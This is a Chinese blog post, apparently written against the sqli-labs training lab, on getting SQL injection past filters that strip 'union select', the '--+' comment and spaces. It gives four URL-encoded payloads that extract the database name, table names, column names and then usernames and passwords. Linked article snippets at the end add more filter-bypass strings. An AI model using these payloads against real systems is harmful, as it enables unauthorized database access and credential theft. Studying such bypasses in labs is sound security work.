关于sql注入过滤union select和--+和空格

最新推荐文章于 2024-01-27 11:25:47 发布
最新推荐文章于 2024-01-27 11:25:47 发布
阅读量928 收藏 3
点赞数
分类专栏: SQL注入及其知识原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43326436/article/details/106609092
版权

一.一些可以替代的
1.空格可以用%0a替代
2.–+可以转换成’1’='1
3.union select 可以用uniOn selEct这种转换中夹杂着大小写

二.实战
真复杂。。。。。。。。。。
1.爆库
0’%0auNion%0aselEct%0a1,(database()),3%0aand%0a’1’=‘1
爆出的库名为security
2.爆表
0’%0auNion%0aselEct%0a1,(selEct%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=‘security’),3%0aand%0a’1’=‘1
爆出表users
3.爆字段
0’%0auNion%0aselEct%0a1,(selEct%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=‘security’%0aand%0atable_name=‘users’),3%0aand%0a’1’=‘1
4.爆数据
0’%0auNion%0aselEct%0a1,(selEct%0agroup_concat(id,username,password)%0afrom%0asecurity.users),3%0aand%0a’1’='1

芋圆奶绿,要半t
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
浅析MySQL中concat以及group_concat的使用
热门推荐
海阔天空sky的博客
08-01 12万+
说明: 本文中使用的例子均在下面的数据库表tt2中执行: 一、concat()函数 1、功能:将多个字符串连接成一个字符串。 2、语法:concat(str1, str2,...) 返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。 3、举例: 例1:select concat (id, name, score) as info from tt
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
9-Web安全——SQL注入WAF绕过之selectunion过滤
网络安全
06-03 1万+
1. selectunion过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符型注入。 然...
SQL注入-union注入
qq_24899063的博客
11-08 838
基础union注入双写绕过
绕过去除unionselectSQL注入
qq_43776408的博客
06-14 1542
去除union代码分析 我就问你看的气不气 全过滤了 绕过去除unionSQL注入 浏览器输入id1’报错 说明存在sql注入漏洞的 猜测原语句为id=‘id’ 在输入id=1’ --+ 依然报错 输入特别大的id故意使其报错 Sqlmap安全测试 ...
第十八节 绕过剔除黑名单(unionselect)的SQL注入-01
09-15
绕过剔除黑名单(unionselect)的SQL注入 SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来获取敏感数据或控制数据库。绕过剔除黑名单(unionselect)的SQL注入SQL注入攻击...
sql注入过滤字典.txt
10-15
通过以上介绍,我们可以了解到SQL注入过滤字典中包含了各种特殊字符和关键词,这些元素在实际应用中可能会导致安全问题。因此,开发者需要了解这些知识点,并采取适当的措施来防范SQL注入攻击。
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
以上总结了多种SQL注入技巧,包括绕过过滤机制、利用SQL语句特性、盲注技巧、特殊字符绕过、多字符编码绕过、SQL关键字绕过、使用注释和空格、多查询绕过以及利用数据库特性等。这些技巧不仅可以帮助测试人员在渗透...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制数据库系统。...
SQL注入之如何检测与判断详细过程
01-31
### SQL注入检测与判断详细过程 #### 一、SQL注入简介 ...本文详细介绍了从初步判断到深入检测的全过程,希望可以帮助读者更好地理解SQL注入的原理,并能够在实际工作中有效地检测和防御SQL注入攻击。
SQL注入绕过
imredboy的博客
03-31 1270
0x01 前言 我们经常利用一些数据库特性来进行WAF绕过。在Mysql中,比如可以这样: 内联注释: /!12345union/select Mysql黑魔法: select{x user}from{x mysql.user}; 换行符绕过:%23%0a、%2d%2d%0a 一起去探索一下能够绕过WAF防护的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6283
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用 /*注释*/ 来标记注释的内容。比如SQL查询: select user() from dual 我们用注释替换空格
变态方法突破过滤UNION+SELECT继续注入
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注射点:     //*ps 此点目前流行的注射工具射不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 1097
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
sql注入过滤关键字(union select等等)
没事我溜达
03-15 8611
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
sql注入利用union来绕过括号过滤
plant1234的博客
04-02 7836
union盲注 当我们在括号被过滤的时候,就不能使用sub(),mid()等多种函数 于是相等union 要想知道uinon的怎么进行盲注,就要了解union 这个给大家看几个mysql的查询语句: 通过这三条语句我们可以看到,我们我利用union将一条数据:1,2,0x69 与查询出来的数据进行降序排序,在排序过程中可以看出用的是ascii码 进行的排序。当我们给的password的ascii值大于admin用户密码的ascii值时,则第一条数据就是我们给的数据。所有就可以判断password的值为
网络安全笔记-SQL注入
L120305q的博客
01-16 1802
SQL注入是开发者对用户输入的参数过滤不严格,导致用户输入的数据能够影响预设查询功能的一种技术
sql注入中的过滤问题
最新发布
csjjjd的博客
01-27 464
在这个语句中,**/被用作注释符号,是一种可以跨行注释的注释符。它将后续的内容都注释掉,从而避免了一些输入过滤对注入的过滤,可以进行SQL注入从而获取数据或进行其他恶意操作。id=1 or 1=1#时提示错误,从这里可以看出对面过滤了点什么导致我的语句出错了,因为我这个语句是用真的,不管放在哪都是会一定正确的,但是这里提示错误的。顺带一提:看来大佬wp后发现其实过滤空格还可以使用()括号来绕过,但是我觉得还是/**/用的习惯,希望本文能够帮助大家。4.直接拿到flag。
SQL注入攻防:绕过注释符过滤技巧
例如,如果原本的SQL注入尝试是`id=-1' union select 1,database(),304--`,而注释符被过滤,可以改写为`id=-1' union select 1,database(),304 OR '1'='1`。这样,即使注释符被移除,`OR '1'='1`部分也会使整个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值